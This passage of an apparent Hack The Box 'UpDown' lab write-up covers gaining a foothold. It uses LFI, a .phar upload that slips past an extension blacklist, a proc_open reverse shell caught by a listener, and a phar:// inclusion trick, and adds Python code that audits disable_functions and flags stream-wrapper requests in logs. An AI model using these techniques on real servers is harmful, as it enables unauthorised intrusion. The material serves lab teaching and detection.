Exploitation


Following a directory fuzzing operation in the /dev/ directory, a Git repository was uncovered. After retrieving it to the Kali machine, a thorough examination of the Git directory revealed a newer “admin panel” version of the target web application. This version features a file upload capability designed for bulk scanning of the websites listed in an uploaded file. Several vulnerabilities were subsequently identified. First, Local File Inclusion (LFI) at the page parameter of the index.php file, caused by the improper use of the PHP include function. Second, the file upload functionality, implemented in the checker.php file and invoked by the index.php file, lacks adequate input sanitization; this oversight becomes particularly critical because the .phar extension is omitted from the extension blacklist, leaving the application open to exploitation. Furthermore, a previously unexplored virtual host, dev.siteisup.htb, was identified as hosting an updated iteration of the “admin panel” beyond the older instance in the /dev/ directory. Access to this admin panel requires a privileged header, specifically special-dev: only4dev.

Additional steps were taken to evaluate the Local File Inclusion (LFI) vulnerability mentioned above and to further enumerate the PHP environment of the target web application. In the course of these checks, a remote file read using the PHP conversion filter technique revealed that the “admin panel” version hosted on the dev.siteisup.htb virtual host mirrors the content of the previously enumerated Git directory. PHP code execution was confirmed through the PHP filter chain technique. However, this capability was notably restricted: the phpinfo output showed an extensive list in the disable_functions field, primarily functions associated with remote code execution. An external Python script, dfunc_bypasser.py (https://github.com/teambi0s/dfunc-bypasser), allowed an efficient scan of the phpinfo results and pinpointed a single PHP function missing from the disabled list, proc_open, which could potentially be used for remote code execution. Moreover, going over the upload feature with the .phar extension confirmed code execution, with a small limitation due to the delegation that takes place at the end of the scan defined in the checker.php file.
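The disable_functions gap described above is the kind of thing a hardening audit should catch before an attacker does. The following is an added example, not part of the original write-up and not the dfunc_bypasser script it mentions: it parses the disable_functions directive from phpinfo output (text or HTML form, both assumed shapes), reports which process-spawning functions are still enabled, and emits the corrected php.ini line. The phpinfo excerpt and the DANGEROUS list are constructed.

```python
import re

# Functions that spawn processes or evaluate code. Any one of them left out of
# disable_functions leaves a path to command execution, which is exactly the
# gap (proc_open) the write-up found. Constructed list, not exhaustive.
DANGEROUS = {
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "pcntl_exec", "dl", "putenv", "mail", "assert",
}

# Matches the directive both in `php -i` text output and in phpinfo() HTML.
PATTERNS = (
    re.compile(r"disable_functions\s*=>\s*([^\n=]*)"),
    re.compile(r'disable_functions</td>\s*<td class="v">([^<]*)</td>'),
)

# Constructed phpinfo-style excerpt modelled on the finding in the write-up:
# a long blacklist that omits proc_open.
PHPINFO_TEXT = (
    "disable_functions => pcntl_alarm,pcntl_fork,pcntl_waitpid,system,exec,"
    "shell_exec,passthru,popen,putenv,dl,pcntl_exec,mail,assert"
    " => pcntl_alarm,pcntl_fork,pcntl_waitpid,system,exec,shell_exec,"
    "passthru,popen,putenv,dl,pcntl_exec,mail,assert\n"
)


def parse_disable_functions(phpinfo_text: str) -> set:
    """Return the function names listed in disable_functions (empty if absent)."""
    for pattern in PATTERNS:
        m = pattern.search(phpinfo_text)
        if m:
            return {f.strip().lower() for f in m.group(1).split(",") if f.strip()}
    return set()


def audit(phpinfo_text: str, dangerous=frozenset(DANGEROUS)) -> list:
    """List dangerous functions that are NOT disabled, sorted for stable output."""
    return sorted(dangerous - parse_disable_functions(phpinfo_text))


def hardened_directive(phpinfo_text: str, dangerous=frozenset(DANGEROUS)) -> str:
    """Build the php.ini line that closes every gap audit() reported."""
    names = sorted(parse_disable_functions(phpinfo_text) | dangerous)
    return "disable_functions = " + ",".join(names)


if __name__ == "__main__":
    print("not disabled:", audit(PHPINFO_TEXT))  # ['proc_open']
    print(hardened_directive(PHPINFO_TEXT))
```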

In the following sections, I will attempt to establish a shell session to the target system by making use of all the information gained above.

Arbitrary File Upload


Uploading the payload. Due to the restrictions imposed by the extensive disable_functions list, the payload contains a PHP reverse shell that relies solely on the PHP proc_open function. Additionally, a few lines of “websites” are prepended for the checker.php file to scan, so that the payload file stays alive while it is being invoked.

There is the payload in the generated directory. Clicking on it will invoke the reverse shell.

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ nnc 9999       
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.177] 60784
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
updown
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.177  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:2e:c1  txqueuelen 1000  (Ethernet)
        RX packets 3561504  bytes 617896147 (617.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3532729  bytes 1691381320 (1.6 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 493236  bytes 25394712 (25.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 493236  bytes 25394712 (25.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the www-data account by exploiting the PHP file upload.

LFI via PHAR


Another way of establishing a foothold is by abusing the phar protocol in conjunction with the LFI. As mentioned previously, PHAR is essentially a PHP Archive, much like a JAR in Java. The phar protocol supports the following format: phar://<PATH_TO_ARCHIVE>/<FILE>.

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ cp proc_open_shell.phar shell.php
┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ zip shell.blahblah shell.php    
  adding: proc_open_shell.phar (deflated 94%)

For this method, I copy the previous payload to the shell.php file. Then I archive shell.php into a ZIP file with an arbitrary extension to bypass the blacklist filter in the checker.php file.

The shell.php file will then be called via LFI from the index.php file, which includes the .php extension.

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ file shell.blahblah 
shell.blahblah: Zip archive data, at least v2.0 to extract, compression method=deflate

Despite the arbitrary extension, the shell.blahblah file is still recognized as a ZIP archive.

Uploading the ZIP archive containing the PHP payload.

There it is! Instead of clicking on it, this archive file will be called via LFI.

Since the phar wrapper can read the contents of an archive, it reaches the archived PHP payload inside the shell.blahblah file and executes it.

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.177] 53370
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
updown
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.177  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:2e:c1  txqueuelen 1000  (Ethernet)
        RX packets 3563133  bytes 618162513 (618.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3533997  bytes 1691514037 (1.6 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 493236  bytes 25394712 (25.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 493236  bytes 25394712 (25.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the www-data account via LFI with phar.
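Both footholds above pass a PHP stream wrapper (php://filter for the file read, phar:// for the include) through the page parameter, which is a pattern a web server log can surface. The following detection logic is an added example, not part of the original write-up: it parses combined-format access log lines (assumed format), URL-decodes each query parameter repeatedly so double encoding is not missed, and flags wrapper prefixes and path traversal. The log lines are constructed to mirror the request shapes discussed on this page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# PHP stream wrappers that should never appear in a value passed to include().
WRAPPERS = ("php://", "phar://", "zip://", "data://", "expect://", "file://", "glob://")

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines: one benign request, then the filter read,
# the phar include and a double-encoded traversal attempt.
SAMPLE_LOG = [
    '10.10.16.8 - - [01/Jan/2023:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.10.16.8 - - [01/Jan/2023:12:00:01 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 9001',
    '10.10.16.8 - - [01/Jan/2023:12:00:02 +0000] "GET /index.php?page=phar://uploads/archive.blahblah/shell HTTP/1.1" 200 0',
    '10.10.16.8 - - [01/Jan/2023:12:00:03 +0000] "GET /index.php?page=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 120',
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated URL encoding so %252F (double-encoded '/') is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target: str) -> list:
    """Return (param, reason) findings for one request target (path + query)."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw).lower()
        if value.startswith(WRAPPERS):
            findings.append((name, "stream wrapper: " + value.split("://", 1)[0] + "://"))
        elif "../" in value or "..\\" in value:
            findings.append((name, "path traversal"))
    return findings


def scan_log(lines) -> list:
    # One alert per suspicious parameter; unparseable lines are skipped.
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in inspect_target(m["target"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "param": param, "reason": reason, "status": m["status"]})
    return alerts
```

Running scan_log(SAMPLE_LOG) yields three alerts on the page parameter (php://, phar://, path traversal) and none for the benign request; a status of 200 on a wrapper hit, as in the constructed lines, is the case worth paging on.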